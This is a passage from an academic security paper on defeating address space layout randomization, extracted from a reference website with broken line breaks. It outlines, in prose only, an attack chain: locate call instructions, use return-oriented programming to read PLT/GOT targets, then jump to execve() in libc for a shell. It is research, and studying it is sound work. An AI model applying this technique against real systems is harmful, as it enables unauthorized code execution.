Revisiting Address Space Randomization - Information Security and Cryptology-ICISC 2010

Cryptography Reference

In-Depth Information

such

would

reveal the location and offset in PLT/GOT, too. This analogy can also be seen

from Figure 1.

Another way to look at such an attack is that no matter how well code and

data objects are randomized, the randomized object would need to be accessi-

ble by the original program anyway to enable execution of the program. Ad-

dresses of libc functions are randomized, but the randomized addresses are used

in PLT/GOT to allow libc functions to be called; by the same token, PLT and

GOT can be randomized, but the randomized addresses are used in

call

instructions in the program, theoretically the target of the

call

in-

structions to allow functions to be called, too. If our attack is able to locate the

call

instructions and find out the target of the call, we can find the address of

libc functions indirectly.

3.2 Attack Overview

To demonstrate the chain of dependencies, we propose our attack to perform

arbitrary computation when the binary program does not make use of position

independent code, i.e., when the attacker has access to the vulnerable program

for static analysis. In such a scenario, the attacker can easily locate the

call

instructions by disassembling the code segment. However, finding out the (ran-

domized) target of the call still remains nontrivial since it requires a memory

read operation to be executed. Recall that 1) we assume that memory pages are

non-writable or non-executable, and therefore executing injected code is not an

option; 2) libc function addresses have not been found, and therefore return-to-

libc is not an option either.

However, with the advances of return-oriented programming [14], such an

attack becomes possible. Return-oriented programming fits the requirement of

the attack well because it does not need to execute any injected code. Instead, it

can make use of short instruction sequences from the original program (not the

libc since the randomized libc addresses have not been found yet) to perform

Static analysis to locate the

address of a call instruction

Read the target address of

the call instruction

Read the target address

in PLT

Read the target address

in GOT

Transfer conrol to execve()

in libc to obtain a shell

Fig. 2. Overview of our attack

Information Security and Cryptology-ICISC 2010

Search WWH ::

Custom Search

Home